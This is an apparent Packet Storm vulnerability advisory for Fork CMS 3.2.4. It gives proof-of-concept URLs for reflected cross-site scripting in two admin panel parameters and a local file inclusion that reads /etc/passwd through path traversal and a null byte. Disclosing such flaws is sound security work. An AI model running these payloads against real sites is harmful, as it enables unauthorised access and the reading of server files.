Fork CMS 3.2.4 Cross Site Scripting / Local File Inclusion

2012-02-13T00:00:00
ID PACKETSTORM:109709
Type packetstorm
Reporter d3v1l
Modified 2012-02-13T00:00:00

Description

                                        
                                            `   
##########################################################################################################################   
  
# Exploit Title: Fork CMS v.3.2.4 - Multiple Vulnerabilities   
  
# Script Page : http://www.fork-cms.com   
  
# Date: 11-02-2012  
  
# Author : RandomStorm - http://www.randomstorm.com  
  
# Avram Marius Gabriel (d3v1l)  
  
# Tested on: Windows XP & Vista  
  
  
##########################################################################################################################   
  
# Reflected Cross-Site Scripting (XSS) on Admin Panel  
  
# POC:   
  
# http://site.com/blog/settings?token=true&report=</script><script>alert(1)</script>   
  
# http://site.com/users/index?token=true&error=</script><script>alert(1)</script>   
  
###########################################################################################################################   
  
# Local File Inclusion ( LFI )  
  
# POC:   
  
# http://site.com/frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00&file=frontend.js&language=en  
  
  
##########################################################################################################################  
  
# About: Fork CMS is dedicated to creating a user friendly environment to build,monitor and update your website.  
  
###########################################################################################################################  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`